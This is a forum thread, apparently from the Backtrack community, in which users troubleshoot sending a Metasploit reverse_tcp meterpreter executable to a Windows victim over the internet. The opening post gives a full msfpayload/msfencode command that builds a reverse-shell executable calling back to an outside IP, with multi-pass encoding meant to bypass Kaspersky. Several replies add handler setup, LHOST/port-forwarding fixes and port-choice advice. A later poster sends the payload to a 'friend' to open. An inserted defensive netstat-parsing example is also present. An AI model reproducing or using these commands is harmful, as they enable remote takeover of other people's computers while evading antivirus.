Thread: MetaSploit - Some problems

  1. #1
    0megear (Just burned his ISO)
    Join Date: Jul 2009
    Posts: 8

    MetaSploit - Some problems

    Hello folks.

    I'm trying to create a test situation where I sploit someone via the internet. To do so, I have 2 computers (1 victim and 1 attacker), each on a different connection, and I generate a simple meterpreter.exe + handler on my backtrackbox and the windows victim will stupidly double click on my .exe

    It's really just for testing purposes and it doesn't even work.

    So this is what I do:

    1. On my Backtrackbox ( 192.168.1.2 // 85.23.145.28 ) I generate the meterpreter and encode it to bypass Kaspersky
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=85.23.145.28 LPORT=8080 R | ./msfencode -e php/base64 -c 6 -t raw | ./msfencode -e x86/shitaka_ga_nai -c 20 -t exe > /root/binaries/final.exe
    2. Then, still on my backtrackbox, I open the handler to receive the reverse from the victim when he double-clicks it
    Code:
    msf> use exploit/multi/handler
    msf> set PAYLOAD windows/meterpreter/reverse_tcp
    msf> set LHOST 85.23.145.28
    msf> set LPORT 8080
    msf> exploit
    
    [-] Handler failed to bind to 85.23.145.28:8080 // I guess this isn't really an issue since it just "listens" for the victim connection, so the local IP should be fine.. right ?
    [*] Started reverse handler on 0.0.0.0:8080
    [*] Starting the payload handler...

    3. Everything seems OK to me so far. Now I'm going to get the .exe and run it on my box

    And it's here that everything seems to fail. I don't know why. I tried without antivirus, my NAT is correct, my port-forwarding is set up and ready to forward...

    I just double click on the exe, a window pops up for 1 sec and then nothing. The handler doesn't move and the meterpreter doesn't seem to work.

    The windows box (victim) is a Windows 7 machine.

    Am I missing something? Did I do something wrong?

    Sincerely,

    0megear
    Last edited by 0megear; 07-07-2010 at 07:47 PM.

  2. #2
    sickness (Administrator)
    Join Date: Jan 2010
    Location: Behind the screen.
    Posts: 2,921

    Re: MetaSploit - Some problems

    Try setting your LHOST to your internal IP if you have done the port forwarding.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    0megear (Just burned his ISO)
    Join Date: Jul 2009
    Posts: 8

    Re: MetaSploit - Some problems

    I don't know what I'm doing wrong but it is not working.

    My victim computer is a Windows 7 (build 7600, unlicensed) without firewall and antivirus. The meterpreter is double clicked, a cmd.exe shows.. and then nothing. No handler when I take a look on my backtrack computer. I tried without encoding and it still doesn't work.

    What is strange about it is that it seems to have random results. During my test, the meterpreter.exe on the victim was popping up for 1 sec then disappearing, and when I generated the exact same meterpreter 15 min later, the cmd.exe was just there, opened, without disappearing.

    I must be doing something wrong but I double checked everything and I just don't get it.

  4. #4
    Just burned his ISO
    Join Date: Feb 2011
    Posts: 2

    Re: MetaSploit - Some problems

    Digging up old topics, I know, but I am posting this just in case someone has encountered the same error and needs help.

    The LHOST should be your backtrack box IP, not the victim IP.
    It should start with 172.x.x.x or 192.168.x.x.x

    After you enter exploit, the victim has to click on the exe file you created to be exploited

    85.23.145.28:8080

    For your understanding, the LHOST (aka Listening Host) should be YOU, or a server you are connected to that is listening for ANY connection from the victim. RHOST (aka Remote Host) will be the victim IP. Therefore in any TROJAN you create, you should always set the LISTENING HOST to YOU, so that when any victim clicks on the exe while you are listening, the trojan will work.

  5. #5
    iproute (Senior Member)
    Join Date: Jan 2010
    Location: Midwest, USA
    Posts: 192

    Re: MetaSploit - Some problems

    I would look for the stager (the payload you generated) exe in Windows Task Manager to see if it is running or just opens then closes. Or perhaps try using netstat in Windows to observe outbound TCP/IP connections. To test if the port forwarding is set up correctly for the handler, you can browse to 85.23.145.28:8080 from the Windows box and watch if the handler responds in any way.
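
The netstat check suggested in the post above, as an added example that is not part of the original thread: Python that parses `netstat -ano -p tcp` output from a Windows host and lists outbound connections to non-internal peers, separating attempts that never got an answer (`SYN_SENT`) from established ones. The sample output is constructed; only `85.23.145.28:8080` comes from the thread, and the function names are this example's own.

```python
import ipaddress

# Constructed `netstat -ano -p tcp` sample; local IPs, PIDs and peers are made up.
SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1100
  TCP    192.168.0.10:3389      198.51.100.20:50211    ESTABLISHED     1100
  TCP    192.168.0.10:49160     85.23.145.28:8080      SYN_SENT        3304
  TCP    192.168.0.10:49161     203.0.113.7:443        ESTABLISHED     2188
  TCP    192.168.0.10:49170     192.168.0.1:445        ESTABLISHED     4
"""

INTERNAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16")]                  # loopback, link-local

def parse_netstat(text):
    """Return (local_port, remote_ip, remote_port, state, pid) per IPv4 TCP row."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) != 5 or f[0] != "TCP":
            continue
        try:
            rhost, _, rport = f[2].rpartition(":")
            rows.append((int(f[1].rpartition(":")[2]),
                         ipaddress.IPv4Address(rhost), int(rport), f[3], int(f[4])))
        except ValueError:
            continue  # IPv6 or malformed row: out of scope for this example
    return rows

def external_outbound(text):
    """List outbound connections to non-internal peers, with a verdict each."""
    rows = parse_netstat(text)
    listening = {lport for lport, _, _, state, _ in rows if state == "LISTENING"}
    findings = []
    for lport, remote, rport, state, pid in rows:
        if state not in ("SYN_SENT", "ESTABLISHED") or lport in listening:
            continue  # not a connection, or inbound to a local service
        if any(remote in net for net in INTERNAL):
            continue
        # A lingering SYN_SENT means no SYN/ACK came back, typically a filtered
        # port or a NAT/firewall dropping the SYN before it reaches a listener.
        verdict = "unanswered" if state == "SYN_SENT" else "connected"
        findings.append({"pid": pid, "remote": f"{remote}:{rport}", "verdict": verdict})
    return findings

if __name__ == "__main__":
    print(*external_outbound(SAMPLE), sep="\n")
```

The PID in each finding can be matched to a process name on the Windows host with `tasklist /FI "PID eq <pid>"`.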

  6. #6
    Just burned his ISO
    Join Date: Mar 2011
    Posts: 4

    Riferimento: MetaSploit - Some problems

    hi,
    I have a problem with Metasploit outside lan ..

    in practice:

    1-forward the port 4444 of my router,

    2-disable the firewall on my pc

    3-create the payload windows / meterpreter / reverse_tcp LHOST with (my ip no-ip), LHPORT = 4444

    4-open mfsconsole:
    use exploit / multi / handler
    September PAYLOAD windows / meterpreter / reverse_tcp
    September LHOST (my internal ip)
    LPORT September 4444
    exploit

    5-send the payload, my friend opens it and nothing happens ..

    what's the problem? within the LAN works ..
    hello

  7. #7
    comaX (Good friend of the forums)
    Join Date: Feb 2010
    Location: Paris, France
    Posts: 338

    Re: Riferimento: MetaSploit - Some problems

    Originally posted by erick:
    hi,
    I have a problem with Metasploit outside lan ..

    in practice:

    1-forward the port 4444 of my router,

    2-disable the firewall on my pc

    3-create the payload windows / meterpreter / reverse_tcp LHOST with (my ip no-ip), LHPORT = 4444

    4-open mfsconsole:
    use exploit / multi / handler
    September PAYLOAD windows / meterpreter / reverse_tcp
    September LHOST (my internal ip)
    LPORT September 4444
    exploit

    5-send the payload, my friend opens it and nothing happens ..

    what's the problem? within the LAN works ..
    hello

    I might say something stupid but... "september" ? 0.o
    And I assume you mistyped but in your post you wrote "LHPORT"

    Also as iproute said, try changing your lport.

    (@iproute : why blocking this port ?)
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  8. #8
    iproute (Senior Member)
    Join Date: Jan 2010
    Location: Midwest, USA
    Posts: 192

    Re: Riferimento: MetaSploit - Some problems

    Originally posted by comaX:
    I might say something stupid but... "september" ? 0.o
    And I assume you mistyped but in your post you wrote "LHPORT"

    Also as iproute said, try changing your lport.

    (@iproute : why blocking this port ?)

    Not sure. Metasploit was the best answer I could come up with. In our list of blocked ports we have it labeled as microsoft dcom or rpc or some such.


    @erick Oh and windows/meterpreter/reverse_tcp_dns is the more appropriate payload if using no-ip dyndns service
    Last edited by iproute; 03-29-2011 at 11:05 PM.

  9. #9
    iproute (Senior Member)
    Join Date: Jan 2010
    Location: Midwest, USA
    Posts: 192

    Re: MetaSploit - Some problems

    Many ISPs block port 4444. We do (I work for one). Try it on another port.
